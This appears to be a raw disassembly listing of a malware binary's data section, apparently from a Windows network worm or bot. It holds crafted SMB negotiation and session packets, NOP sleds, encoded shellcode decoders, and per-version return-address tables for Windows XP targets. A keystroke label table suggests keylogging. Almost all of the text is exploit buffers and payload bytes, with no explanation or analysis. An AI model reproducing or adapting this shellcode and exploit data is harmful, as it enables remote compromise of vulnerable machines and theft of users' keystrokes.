dd 0D2B7ACC5h, 0AB285C9Eh, 54F58E7Eh, 1EF0BFA3h, 0FC370693h
dd 0B6B21CD0h, 0B35B23D5h, 3BD4E764h, 0BD1FE911h, 6696F5C8h
dd 0C7D84740h, 56F525C2h, 0B1E658D7h, 85459C41h, 0CF5515B8h
dd 1B99583Eh, 0E479E2EFh, 0F5B9A1AFh, 5BADB1C4h, 0FCB06DFh
dd 6FF714h, 0F450AEC3h, 0BE20C3AFh, 1D9B9B89h, 902F08B5h
dd 0B593A29Ch, 0AD3EB99h, 65BD84B4h, 0DCF9C147h, 4FB358D5h
dd 1F051851h, 665F64B7h, 4F7D2E50h, 0FD32403Ah, 0CAA2048Eh
dd 0E8ECD048h, 1C68BE70h, 0C1F22032h, 2C20A9E2h, 0AFD8F043h
dd 0AD2A81EFh, 39300457h, 0ACBB45F6h, 54D49701h, 16DF66BFh
dd 4B670129h, 856AA3B8h, 0A04D2B42h, 0B6FB0C9Bh, 81BDC57Ch
dd 0D9741A3Eh, 584B13DFh, 0EACF0598h, 9CEBFF61h, 3FEC7886h
dd 3FD3839h, 8BC57D88h, 1615362Dh, 3C94E81Bh, 10890BE9h
dd 1114E699h, 2F8C54Fh, 0B195A1B8h, 0F62BCF58h, 3F3E17B2h
dd 0E2DE4865h, 0B8E74DAEh, 0BFFADE91h, 0E6463Ch, 0A37E40A4h
dd 0A0A1DE35h, 15EBF902h, 27A4A30h, 3A2DE938h, 942C18F3h
dd 35F74713h, 0A03749A7h, 0BFAA1B98h, 0E3028BF5h, 6A5444F4h
dd 0BF8D9185h, 0C24CE40Ch, 8239677Fh, 4B0E4B66h, 0ACA84C34h
dd 51110F0Ah, 0A35A3E7Bh, 0F24626FBh, 6D3BAF84h, 81774A00h
dd 0B7DB7009h, 0A2EFECF5h, 110328F8h, 1D3D93ADh, 4FC3D6ACh
dd 7382EFFAh, 7B7D0CAh, 6E901B06h, 0F0B60013h, 24E563BBh
dd 5AB55F0Fh, 0EA2829F2h, 9F08AC70h, 7E92BB80h, 0E2F4253Ch
dd 91578ABFh, 0D28AC0F1h, 423A4F01h, 0C35570EEh, 70C4C75h
dd 0DFA846FFh, 684519A9h, 17172D0h, 0DDAF22E1h, 9CE4A188h
dd 15F6C071h, 891109F0h, 53830A1Fh, 6C4E501Dh, 0BC6F6409h
dd 3F57EAAEh, 0D33E15B4h, 0ED924307h, 84B75E17h, 36912673h
dd 92FBFC09h, 0FAEA348Ah, 0BB32A7A8h, 0C47B3235h, 2F37282Ah
dd 0FBB32D08h, 0ABDB16D8h, 3B7ACC5h, 0ABD95C0Bh, 54F58E7Eh
dd 1EF0BFA3h, 0FC37145Ch, 0B6B21CFBh, 0B3BE90D5h, 0A1D4E764h
dd 0BD1FE911h, 6696F5C8h, 8BD84740h, 56F5258Dh, 0B1E658D7h
dd 46039C41h, 0CF551570h, 1B99583Eh, 0E415E2EFh, 0F5FEA1AFh
dd 5BADB1C4h, 0FCB06DFh, 6FF714h, 0AA50AEC3h, 0BE20C3AFh
dd 1D9B9BD2h, 902F08B5h, 0B58AA29Ch, 0AD3EB99h, 656D84B4h
dd 0DCF9C147h, 812E58D5h, 8B051851h, 665F64B7h, 4F7DCD50h
dd 0FD32403Ah, 0CAA2048Eh, 0E848D048h, 1C219170h, 0C1F22032h
dd 2CC3A9E2h, 0AFD8F043h, 0AD2A81EFh, 39300457h, 0ACBB45F6h
dd 54D4979Ah, 16DFE8BFh, 4BDAB329h, 856AA3B8h, 0A04D2B42h
dd 0B6FB7E9Bh, 0ABBDC5D7h, 0D9741A3Eh, 584B13DFh, 0EACF0598h
dd 9CEBFF61h, 3FEC7886h, 3FD3839h, 8BC57D88h, 1615362Dh
dd 0BE94E81Bh, 10890BE9h, 1114E699h, 2F8C54Fh, 0B195A1B8h
dd 0F62BCF58h, 3F3E17B2h, 0E2DE1865h, 0B8E74DADh, 0BFFADE91h
dd 0E6463Ch, 0A37E40A4h, 0A0A1DE35h, 15EBF9DCh, 27AFD30h
dd 3A2DE938h, 942C18F3h, 64F74713h, 0A03749A7h, 0BFAA1B98h
dd 0E3028BF5h, 6A5444F4h, 0BF8D9132h, 0C24CE40Ch, 8239677Fh
dd 4B0E4B66h, 0ACA84C34h, 51110F0Ah, 0A35A3E7Bh, 0F24626FBh
dd 6D3BAF84h, 81774A00h, 0B7DB7009h, 0A2EFECF5h, 110328F8h
dd 1D3DB8ADh, 4FC3D6ACh, 7382EFFAh, 7B7D0CAh, 8C01B06h
dd 2 dup(0)
dword_4403E8 dd 0AD00F0h, 0D00BAh, 0AD00F0h, 0D00BAh, 0AD00F0h, 0D00BAh
; DATA XREF: .text:00410375�o
dd 0AD00F0h, 0AB00BAh, 3 dup(0AB00ABh), 0ABh, 0BAADh, 40000h
dd 0
dd 40000h, 430000h, 5C003Ah, 40000h, 0
dd 40000h, 430000h, 5C003Ah, 40000h, 0
dd 40000h, 430000h, 5C003Ah, 1F500000h, 130079h, 0
dd 130000h, 640000h, 6D006Fh, 690061h, 2E006Eh, 610062h
dd 740073h, 720061h, 2E0074h, 65006Eh, 74h, 0BAADh, 1F980000h
dd 0B0079h, 0
dd 0B0000h, 440000h, 4D004Fh, 490041h, 5C004Eh, 4C0042h
dd 41h, 6C68BAADh, 6FF80013h, 780871B6h, 7906B81Dh, 681B4105h
dd 0A519318Fh, 8EF1AE30h, 0FEA20E2Dh, 0E10BAE59h, 0F668E92Fh
dd 3DBBE22Bh, 0C9FE0679h, 10BC298Fh, 7A80C221h, 0AE21D2C8h
dd 4BB6B50Eh, 6341DBF5h, 503DCD4Fh, 16B2EC49h, 62E61679h
dd 48066954h, 18A491ADh, 65476540h, 9C51320Ch, 8918033Fh
dd 0A8CFCA73h, 4544AF4Eh, 45745E1Ah, 2AA23559h, 0B312E7C7h
dd 250D2D9Bh, 9F72D49Ah, 0CD63800Bh, 0B488DB31h, 0FBFFF7A7h
dd 8B52B7BEh, 0E24E0F98h, 7E3F94C6h, 0A0BA7AC2h, 8F3EAC69h
dd 32706D45h, 0FFFA1DFCh, 2FF75D6Eh, 974CDF4Fh, 2A6FD55Eh
dd 3597F736h, 0EC535F2h, 24D28A6Bh, 0FED5ED62h, 3D5BB4C6h
dd 51A693F8h, 0EABEB7CDh, 853D253Bh, 7B4CEA2Eh, 0B465545Eh
dd 63045DD4h, 0E8D119Ah, 51529C16h, 1F717A3Ah, 0B77EE55Ch
dd 0E653AEBDh, 1A26D3B9h, 24EED272h, 0D590E979h, 533C056Bh
dd 0AF028119h, 72C03514h, 61FC14ABh, 0F2B90F3Fh, 93DE26C0h
dd 1796F37h, 0D7DA3452h, 0D815311Dh, 0D143E127h, 0C9CA5CB9h
dd 0C904E41h, 68CAD06Bh, 0DFDF54F1h, 0FF2E9AE0h, 0F19918E2h
dd 89B2F77Ah, 6E508D09h, 233B4704h, 91F429ABh, 76117BA2h
dd 0D09B57DDh, 891B18C9h, 0F4931D47h, 0B2243192h, 0D59B1C2Dh
dd 85E02CA5h, 0C9BC5C0Eh, 391E990Dh, 78B62407h, 0DE0497A4h
dd 4862937Dh, 6EA0E05Ah, 0CBA5AFF7h, 68104795h, 0F94C833Dh
dd 1BEAA05Dh, 0A1E74B9Ah, 56F21589h, 1CD8D722h, 75E3EE2Fh
dd 77BD6D19h, 0B2415BF0h, 0C573CD85h, 3146AA92h, 4E6AB17Dh
dd 6038110Dh, 0C5E9C0A5h, 0EE83E634h, 0C79E34F8h, 1F2137D6h
dd 0C25536DAh, 945DDB80h, 2EAFF676h, 0CF562D07h, 0BB6B6C1Ch
dd 3C6AF0A7h, 0DE8A55BDh, 0A0DDD260h, 15003D6h, 0E290152h
dd 0CF353A38h, 51B72663h, 8DCD3FD0h, 986F2F49h, 0C5F77BDh
dd 364A9BCh, 6A7C6B6Fh, 6E90B28Dh, 6FF80013h, 780871B6h
dd 6412B81Dh, 712E4483h, 16CE899Eh, 41BF70E6h, 0FE09C7F6h
dd 0E1DAB4F0h, 24F7E92Fh, 51DE48F1h, 0C9FE5877h, 85B35868h
dd 74CC2A4h, 0AE00ACC8h, 24D7C0Eh, 63416DF1h, 50ACAB4Fh
dd 16B2EC49h, 0ADFF1EE6h, 0EC060AA1h, 1EB1C0A2h, 0A5AD6640h
dd 9CDCD90Ah, 8918DD3Fh, 0A8CFCA73h, 45448B0Bh, 0B574DD10h
dd 2AA272B4h, 0B312E7C7h, 0AD0D2D9Bh, 9F71D49Ah, 50D7750Bh
dd 0B488DB31h, 7EFFF7A7h, 8B72B7BEh, 0A14ED9A8h, 7E3F94C6h
dd 0A0BA60C2h, 0F3EEA69h, 32706D45h, 91FA1DD2h, 2FF75D6Eh
dd 974C46E4h, 2A6FD58Dh, 3697F736h, 0EC535F2h, 24648A6Bh
dd 0FED5ED95h, 3D5BB4C6h, 51A60FF8h, 0EABEB7CDh, 74FF8EEAh
dd 0CD4CEA98h, 0B465545Eh, 63CA5DD4h, 0E8D699Ah, 51529C16h
dd 1F717A3Ah, 0B77EE55Ch, 0E653AE6Dh, 1A26D3B9h, 24EED272h
dd 0D590E979h, 533C056Bh, 0AF028119h, 72C03514h, 61FC16F4h
dd 0F291A03Fh, 93DE26C0h, 1796F37h, 0D7DA34B8h, 0D8153186h
dd 0D143E144h, 0C9CAF5B2h, 0C906E41h, 68CAD06Bh, 0DFDF54F1h
dd 0FF2E9AE0h, 0F19918E2h, 897AF77Ah, 6E0E8D09h, 233B4704h
dd 91F429ABh, 761129A2h, 0D09B57DDh, 891B18C9h, 0F4FD1D47h
dd 0B2243192h, 0D59B1C2Dh, 85E02CA5h, 0C9BC5C0Eh, 391E990Dh
dd 78B62407h, 0DE0497A4h, 4862937Dh, 6EA0E05Ah, 0CBA5AFF7h
dd 688D4795h, 0F94C833Dh, 1BEAA05Dh, 0A1E74B9Ah, 56F21589h
dd 1CD8D722h, 75C2EE2Fh, 77BD6D19h, 0B2415BF0h, 0C573CD85h
dd 3146AA92h, 4E6AB17Dh, 6038110Dh, 0C5E9C0A5h, 0DD83F934h
dd 0C79E34C3h, 1F2137D6h, 0C25536DAh, 945DDB80h, 2EAFF676h
dd 0CF9D2D07h, 0BB6B6C1Ch, 3C6AF0A7h, 0DE8A55BDh, 0A0DDD260h
dd 15003D6h, 0E290152h, 0CF353A38h, 51B7263Eh, 8DCD3FD0h
dd 986F2F49h, 0C5F77BDh, 364A9BCh, 6A7C6B6Fh, 8C0B28Dh
dd 2 dup(0)
dword_4408E8 dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
; DATA XREF: .text:0041074B�o
dd 0FEFF0000h, 0
dd 2006200h
aPcNetworkPro_1 db 'PC NETWORK PROGRAM 1.0',0
db 2
aLanman1_0_1 db 'LANMAN1.0',0
dw 5702h
aIndowsForWor_1 db 'indows for Workgroups 3.1a',0
db 2
aLm1_2x002_1 db 'LM1.2X002',0
dw 4C02h
aAnman2_1_1 db 'ANMAN2.1',0
db 2, 4Eh, 54h
aLm0_12_1 db ' LM 0.12',0
align 8
dword_440978 dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: .text:0041078F�o
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows20002_0:
unicode 0, <Windows 2000 2195>,0
aWindows20005_1:
unicode 0, <Windows 2000 5.0>,0
align 10h
dd 2 dup(0)
dword_440A28 dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: .text:004107C2�o
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 41ED0000h, 2686272Ch
dd 0B3A059D2h, 8800AA5Eh, 57C56Fh, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dword_440B08 dd 5A000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
; DATA XREF: .text:00410803�o
dd 0FEFF0000h, 300800h, 5A00FF04h, 1000800h, 2F00h, 0
dword_440B3C dd 3F3F0000h, 3F3F3Fh, 0 ; DATA XREF: .text:00410868�o
dword_440B48 dd 66000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
; DATA XREF: .text:004108E4�o
dd 4780800h, 400800h, 0DE00FF18h, 1000DEh, 16h, 0
dd 2019Fh, 4 dup(0)
dd 1, 40h, 2, 1303h, 62005Ch, 6F0072h, 730077h, 720065h
dd 2 dup(0)
dword_440BB8 dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: .text:00410923�o
dd 4780800h, 500800h, 48000010h, 0
dd 10h, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 5940h, 50005Ch, 500049h
dd 5C0045h, 400000h, 30B0005h, 10h, 48h, 1, 10B810B8h
dd 0
dd 1, 10000h, 8D9F4E40h, 11CEA03Dh, 8698Fh, 1B05303Eh
dd 1, 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 2 dup(0)
dword_440C60 dd 90080000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: .text:00410976�o
dd 4780800h, 600800h, 3C000010h, 8, 1, 2 dup(0)
dd 3C005400h, 2005408h, 2600h, 84D40h, 50005Ch, 500049h
dd 5C0045h, 400000h, 3000005h, 10h, 83Ch, 1, 824h, 360000h
dd 11h, 0
dd 11h, 4F0052h, 54004Fh, 53005Ch, 530059h, 450054h, 5C004Dh
dd 2 dup(300030h), 0
dd 0FFFFh, 7E0h, 2 dup(0)
dd 7C0h, 0
dd 2 dup(90909090h), 909008EBh, 767A1567h, 909008EBh, 767A1567h
dd 909008EBh, 767A1567h, 909008EBh, 767A1567h, 909008EBh
dd 767A1567h, 909008EBh, 767A1567h, 909008EBh, 767A1567h
dd 909008EBh, 767A1567h, 909008EBh, 767A1567h, 909008EBh
dd 767A1567h, 90909090h, 0EB909090h, 48909008h, 9088444Fh
dd 4 dup(90909090h), 0
dword_440D94 dd 7E0h, 4, 3 dup(0) ; DATA XREF: .text:004109B3�o
dword_440DA8 dd 0E983C929h, 0D9EED9B0h, 5BF42474h, 19137381h, 833704F5h
; DATA XREF: .text:004109A0�o
dd 0F4E2FCEBh, 7AEF9FE5h, 0C8FB0CF1h, 5B8F95E6h, 728FD13Dh
dd 32787E25h, 0BCEBF461h, 688FED56h, 7EEFF439h, 368FC192h
dd 0AEC4C4F7h, 43C471B5h, 3ACE341Eh, 0C3EF3718h, 1F20A122h
dd 688F106Ch, 51EFF43Dh, 0BC4FF992h, 0DC05E946h, 0BE8FD91Ah
dd 5618D175h, 53DFC4DAh, 0BC34B692h, 478FF959h, 778F5805h
dd 0B96CAB11h, 67E8FB57h, 646223E6h, 5379D7Fh, 5778271h
dd 0E7FBA146h, 0CBE93E71h, 0E1FBA522h, 51E17C46h, 350C1898h
dd 0C8069F4Ch, 3EDD9DC9h, 0C85358ECh, 6457A6CFh, 6447A64Ah
dd 0E7FBA65Ah
db 7Fh, 9Dh
word_440E62 dw 551Ah ; DATA XREF: .text:00410994�w
dd 0D68DA67Fh, 2DA09D8Ch, 0C8533269h, 66149FCFh, 5FD40A4Ch
dd 0DE2A58BDh, 64D20A4Eh, 5FD40A4Ch, 7E82BCFCh, 67D20A4Eh
dd 0C851A14Dh, 0D06C66C9h, 607D3360h, 0C85123E6h, 536E93C9h
dd 5A679D7Fh, 676E1090h, 0BEC8DC40h, 0BE409FFEh, 0C4C4C4FBh
dd 1A460BB3h, 0A428B7E7h, 9C3C8F94h, 456C5EB2h, 0C81246E7h
dd 0E1FBB16Ch, 6656A242h, 366EA448h, 6651A448h, 9A6C25E6h
dd 64CAF0C0h, 0C86E23E6h, 0E7FBC2E6h, 0B4F8A292h, 0E1FB91DDh
dd 5FD40A4Bh, 57E43BF6h, 0C8D20A4Ah, 3704F5C9h, 2 dup(0)
dword_440F08 dd 401150FFh, 0 ; DATA XREF: sub_410A35+17�o
dword_440F10 dd 142FFA1h, 0 ; DATA XREF: sub_410A35+28�o
dword_440F18 dd 401138FFh, 0 ; DATA XREF: sub_410A35+3E�o
dword_440F20 dd 14308B9h, 0 ; DATA XREF: sub_410A35+4F�o
dword_440F28 dd 320002h, 90909090h, 0ECC1F631h, 0CE4C10Ch, 0FB89E789h
; DATA XREF: sub_410A35+F0�o
dd 748B016Ah, 0D231FE24h, 0E2C14252h, 56575210h
db 0B8h
byte_440F4D db 3 dup(0) ; DATA XREF: sub_410A35+1C�o
; sub_410A35+43�o
dd 8E8C100h, 0C08510FFh, 0DC890779h, 75F6854Eh, 90E7FFE1h
dd 3 dup(90909090h)
aRrrrrrrrrrrrrr db '',0
; DATA XREF: sub_410A35:loc_410A89�o
a1_1_1_1_1_1 db '1.1.1.1.1.1',0
aIa db 'ë€',0
align 10h
byte_440FB0 db 0EBh ; DATA XREF: sub_410BF8+C8�r
db 2, 0EBh, 5
dd 0FFFFF9E8h, 0C08358FFh, 1A08D1Bh, 83FFFFFCh, 0EC8BFCE4h
dd 0B966C933h, 3080020Ch, 0FAE24080h, 80BF6810h, 0CE0E8080h
dd 7EF26C8Eh, 39039633h, 4752F835h, 151CE827h, 0EA21EE9Ah
dd 475358BDh, 0BF086827h, 0F3F71ECAh, 0B2B3DFB2h, 7C6D4B80h
dd 758959BBh, 0F09A242Dh, 0AE2D2447h, 6C96569h, 0E4EDE3C9h
dd 0E4D2DA80h, 80B021E7h, 0B8CC00Bh, 0B2D9CF0h, 720B88D8h
dd 6F017E0Bh, 80808180h, 883149B3h, 80811068h, 7FD6D280h
dd 0BDA60D7h, 87460358h, 853149B3h, 8081FC68h, 80036880h
dd 1E68080h, 0D481106Ch, 808181E8h, 6CD77F80h, 40B36C0Bh
dd 0D0D0D0D0h, 0D0C0D0C0h, 0B70D77Fh, 0C547E658h, 0E6808280h
db 47h, 0C5h, 82h
word_44107F dw 0D080h ; DATA XREF: sub_410BF8+58�w
db 47h, 0C5h, 84h
dd 80808080h, 0D3D590EAh, 574D77Fh, 0C062F540h, 0D77FD3D0h
dd 0D3D0D078h, 0B7CD77Fh, 0B340B358h, 0D7913149h, 2B737D0Bh
dd 80C546DFh, 0BCDD09C4h, 9B8DD09h, 47E6C0DDh, 8181ACC5h
dd 0D0C4C50Dh, 0D1D1D1D5h, 0D1C9D1C1h, 7FD1D6D1h, 40B350D7h
dd 0D77FD0C8h, 0B340B354h, 0D7913149h, 2B737D0Bh, 0C4CD0DDFh
dd 0D0D0D5D1h, 80EA84EAh, 0D0D6D0D0h, 150D77Fh, 8084806Ch
dd 8087E880h, 7FD48081h, 0D77FC8F5h, 0E8C0EA58h, 80809080h
dd 80D080E8h, 7F80EA80h, 0D77FC4F5h, 1580B5Ch, 80818043h
dd 0A41C0980h, 80808038h, 34A41C09h, 0B808080h, 8484A40Ch
dd 0C1478080h, 1010107Bh, 7FC14610h, 2690110h, 0EA808081h
dd 9080E880h, 0D0D18080h, 7FC4F57Fh, 7FD460D7h, 0D77FC8F5h
dd 0C8F57F64h, 0B368D77Fh, 7FD0C840h, 0D5D354D7h, 0EC0BD7D6h
dd 0C50B98A4h, 85D40BBCh, 0B5583F8h, 0DA0B98CAh, 635D83A0h
dd 0B40BC9B9h, 0B375830Bh, 40B37C7Fh, 0F444BA2Ch, 1010108Bh
dd 8D4F4110h, 6E6B7883h, 94A4FCBBh, 0DA0B5DF5h, 0E65D83A4h
dd 0BCB8C0Bh, 5D839CDAh, 830B840Bh, 10856B45h, 40B31010h
dd 0DEDF550Bh, 8442DBDDh, 7FD3D180h, 7F1868B6h, 2D2B7F7Fh
dd 7162D9DBh, 43h
dword_4411E0 dd 4Fh, 4Eh, 41h, 42h, 41h, 43h, 41h, 0C1h, 41h, 0C3h
; DATA XREF: .text:00410DA9�o
dd 41h, 0C9h, 41h, 0CAh, 41h, 0CBh, 41h, 0CCh, 41h, 0CDh
dd 41h, 0CEh, 41h, 0CFh
dword_441240 dd 41h, 0D0h ; DATA XREF: .text:00410DD5�o
aFb db 'fìÐ',7,0 ; DATA XREF: sub_410F37+97�o
align 10h
dword_441250 dd 129F74h, 0 ; DATA XREF: sub_410F37+2FD�o
dword_441258 dd 127D78h, 0 ; DATA XREF: sub_410F37+35D�o
dword_441260 dd 0E983C933h, 0D9EED9B0h, 5BF42474h, 3D137381h, 836F5088h
; DATA XREF: sub_410F37+C4�o
dd 0F4E2FCEBh, 22BBE2C1h, 90AF71D5h, 3DBE8C2h, 2ADBAC19h
dd 6A2C0301h, 0E4BF8945h, 30DB9072h, 26BB891Dh, 6EDBBCB6h
dd 0F690B9D3h, 1B900C91h, 629A493Ah, 9BBB4A3Ch, 4774DC06h
dd 30DB6D48h, 9BB8919h, 0E41B84B6h, 84519462h, 0E6DBA43Eh
dd 0E4CAC51h, 0B8BB9FEh, 0E460CBB6h, 1FDB847Dh, 2FDB2521h
dd 0E138D635h, 3FBC8673h, 3C365EC2h, 5D63E05Bh, 5D23FF55h
dd 0BFAFDC62h, 93BD4355h, 0B9AFD806h, 9B50162h, 6D5865BCh
dd 9052E268h, 6689E0EDh, 900725C8h, 3C03DBEBh, 3C13DB6Eh
dd 0BFAFDB7Eh, 0A857E05Bh, 8ED9DB5Bh, 75F4E0A8h, 90074F4Dh
dd 3E40E2EBh, 7807768h, 867E2599h, 3C86776Ah, 7807768h
dd 26D6C1D8h, 3F86776Ah, 9005DC69h, 88381BEDh, 38294E44h
dd 90055EC2h, 0B3AEEEDh, 233E05Bh, 3F3A6DB4h, 0E69CA164h
dd 0E614E2DAh, 9C90B9DFh, 42127697h, 0FC7CCAC3h, 0C468F2B0h
dd 1D382396h, 90463BC3h, 0B9AFCC48h, 3E02DF66h, 6E3AD96Ch
dd 3E05D96Ch, 0C23858C2h, 3C9E8DE4h, 903A5EC2h, 0BFAFBFC2h
dd 0ECACDFB6h, 0B9AFECF9h, 780776Fh, 305402CDh, 9086776Eh
dd 6F5088EDh, 2 dup(0)
dword_4413C0 dd 5B03EB60h, 0F8E8C353h, 31FFFFFFh, 13404C0h, 315B50D8h
; DATA XREF: sub_410F37+AA�o
dd 401002D2h, 50403002h, 4104C031h, 0C628C228h, 6604E2C0h
dd 3104EAC1h, 2F630C0h, 66032803h, 58431301h, 802C931h
dd 61D5E0h, 433F0Ch
dword_441404 dd 77BD3143h ; DATA XREF: sub_410F37+82�r
dword_441408 dd 7FCh ; DATA XREF: sub_410F37+7C�r
byte_44140C db 1 ; DATA XREF: sub_410F37+29C�r
; sub_410F37+2C3�r ...
align 10h
dd offset aWindowsXpSp01E ; "Windows XP SP0+1 ENG"
dd 77C03143h, 7FCh, 1, 433EE0h, 77BD1F89h, 7FCh, 1, 433ECCh
dd 77BD1FA8h, 7FCh, 1, 433EB8h, 77BD1FD6h, 7FCh, 1, 433EA4h
dd 77BD2195h, 7FCh, 1, 433E90h, 77BD21B3h, 7FCh, 1, 433E7Ch
dd 77BD21E0h, 7FCh, 1, 433E68h, 77BD220Ch, 7FCh, 1, 433E54h
dd 77BD2241h, 7FCh, 1, 433E40h, 77BD22D2h, 7FCh, 1, 433E2Ch
dd 77BD28B2h, 7FCh, 1, 433E18h, 77BD29ABh, 7FCh, 1, 433E04h
dd 77BD29E7h, 7FCh, 1, 433DF0h, 77BD29F7h, 7FCh, 1, 433DDCh
dd 77BD2A03h, 7FCh, 1, 433DC8h, 77BD2D6Dh, 7FCh, 1, 433DB4h
dd 77BD2DB3h, 7FCh, 1, 433DA0h, 77BD2EC2h, 7FCh, 1, 433D8Ch
dd 77BD2EDDh, 7FCh, 1, 433D78h, 77BD30AFh, 7FCh, 1, 433D64h
dd 77BD312Bh, 7FCh, 1, 433D50h, 77BD3160h, 7FCh, 1, 433D3Ch
dd 77BD349Ah, 7FCh, 1, 433D28h, 77BD34E4h, 7FCh, 1, 433D0Ch
dd 655B4F02h, 7E7h, 0
dd offset aWindowsUkXp_23 ; "Windows uk xp pro sp1 1"
dd 77C01F89h, 7FCh, 1, 433CDCh, 77C01FA8h, 7FCh, 1, 433CC4h
dd 77C01FD6h, 7FCh, 1, 433CACh, 77C02195h, 7FCh, 1, 433C94h
dd 77C021B3h, 7FCh, 1, 433C7Ch, 77C021E0h, 7FCh, 1, 433C64h
dd 77C0220Ch, 7FCh, 1, 433C4Ch, 77C02241h, 7FCh, 1, 433C34h
dd 77C022D2h, 7FCh, 1, 433C18h, 77C028B2h, 7FCh, 1, 433BFCh
dd 77C029ABh, 7FCh, 1, 433BE0h, 77C029E7h, 7FCh, 1, 433BC4h
dd 77C029F7h, 7FCh, 1, 433BA8h, 77C02A03h, 7FCh, 1, 433B8Ch
dd 77C02A39h, 7FCh, 1, 433B70h, 77C02D6Dh, 7FCh, 1, 433B54h
dd 77C02DB3h, 7FCh, 1, 433B38h, 77C02EC2h, 7FCh, 1, 433B1Ch
dd 77C02EDDh, 7FCh, 1, 433B00h, 77C030AFh, 7FCh, 1, 433AE4h
dd 77C0312Bh, 7FCh, 1, 433AC8h, 77C03143h, 7FCh, 1, 433AACh
dd 77C03160h, 7FCh, 1, 433A90h, 77C0349Ah, 7FCh, 1, 433A74h
dd 77C034E4h, 7FCh, 1, 433A5Ch, 77B920FDh, 7FCh, 1, 433A44h
dd 77B9211Ch, 7FCh, 1, 433A2Ch, 77B9214Ah, 7FCh, 1, 433A14h
dd 77B9230Ch, 7FCh, 1, 4339FCh, 77B9232Ah, 7FCh, 1, 4339E4h
dd 77B92357h, 7FCh, 1, 4339CCh, 77B92383h, 7FCh, 1, 4339B4h
dd 77B923B8h, 7FCh, 1, 43399Ch, 77B92448h, 7FCh, 1, 433980h
dd 77B92AAAh, 7FCh, 1, 433964h, 77B92BA7h, 7FCh, 1, 433948h
dd 77B92BE3h, 7FCh, 1, 43392Ch, 77B92BF3h, 7FCh, 1, 433910h
dd 77B92BFFh, 7FCh, 1, 4338F4h, 77B92F78h, 7FCh, 1, 4338D8h
dd 77B92FBEh, 7FCh, 1, 4338BCh, 77B930EFh, 7FCh, 1, 4338A0h
dd 77B9310Dh, 7FCh, 1, 433884h, 77B9330Ch, 7FCh, 1, 433868h
dd 77B93388h, 7FCh, 1, 43384Ch, 77B9339Eh, 7FCh, 1, 433830h
dd 77B933BAh, 7FCh, 1, 433814h, 77B9373Dh, 7FCh, 1, 4337F8h
dd 77B9378Ah, 7FCh, 1, 4337E0h, 77B920FDh, 7FCh, 1, 4337C8h
dd 77B9211Ch, 7FCh, 1, 4337B0h, 77B9214Ah, 7FCh, 1, 433798h
dd 77B9230Ch, 7FCh, 1, 433780h, 77B9232Ah, 7FCh, 1, 433768h
dd 77B92357h, 7FCh, 1, 433750h, 77B92383h, 7FCh, 1, 433738h
dd 77B923B8h, 7FCh, 1, 433720h, 77B92448h, 7FCh, 1, 433704h
dd 77B92AAAh, 7FCh, 1, 4336E8h, 77B92BA7h, 7FCh, 1, 4336CCh
dd 77B92BE3h, 7FCh, 1, 4336B0h, 77B92BF3h, 7FCh, 1, 433694h
dd 77B92BFFh, 7FCh, 1, 433678h, 77B92F78h, 7FCh, 1, 43365Ch
dd 77B92FBEh, 7FCh, 1, 433640h, 77B930EFh, 7FCh, 1, 433624h
dd 77B9310Dh, 7FCh, 1, 433608h, 77B9330Ch, 7FCh, 1, 4335ECh
dd 77B93388h, 7FCh, 1, 4335D0h, 77B9339Eh, 7FCh, 1, 4335B4h
dd 77B933BAh, 7FCh, 1, 433598h, 77B9373Dh, 7FCh, 1, 43357Ch
dd 77B9378Ah, 7FCh, 1, 433570h, 41414141h, 7FCh, 1, 433558h
dd 77E14C29h, 7FCh, 1, 433540h, 77E3CB4Ch, 7FCh, 1, 433528h
dd 77E42C75h, 7FCh, 1, 433510h, 77E3C256h, 7FCh, 1, 4334F8h
dd 77E2AFC5h, 7FCh, 1, 4334E0h, 77E2492Bh, 7FCh, 1, 4334C8h
dd 77E4FF15h, 7FCh, 1, 4334B0h, 77E33F4Dh, 7FCh, 1, 8
dword_441AC4 dd 62h, 62000000h, 2 dup(0) ; DATA XREF: sub_414BFB:loc_414CDA�o
dd 0Dh, 65h, 65000000h, 2 dup(0)
dd 1Bh, 4353455Bh, 5B00005Dh, 5D435345h, 0
dd 70h, 5D31465Bh, 5B000000h, 5D3146h, 0
dd 71h, 5D32465Bh, 5B000000h, 5D3246h, 0
dd 72h, 5D33465Bh, 5B000000h, 5D3346h, 0
dd 73h, 5D34465Bh, 5B000000h, 5D3446h, 0
dd 74h, 5D35465Bh, 5B000000h, 5D3546h, 0
dd 75h, 5D36465Bh, 5B000000h, 5D3646h, 0
dd 76h, 5D37465Bh, 5B000000h, 5D3746h, 0
dd 77h, 5D38465Bh, 5B000000h, 5D3846h, 0
dd 78h, 5D39465Bh, 5B000000h, 5D3946h, 0
dd 79h, 3031465Bh, 5B00005Dh, 5D303146h, 0
dd 7Ah, 3131465Bh, 5B00005Dh, 5D313146h, 0
dd 7Bh, 3231465Bh, 5B00005Dh, 5D323146h, 0
dd 0C0h, 60h, 7E000000h, 2 dup(0)
dd 2 dup(31h), 21000000h, 2 dup(0)
dd 2 dup(32h), 40000000h, 2 dup(0)
dd 2 dup(33h), 23000000h, 2 dup(0)
dd 2 dup(34h), 24000000h, 2 dup(0)
dd 2 dup(35h), 25000000h, 2 dup(0)
dd 2 dup(36h), 5E000000h, 2 dup(0)
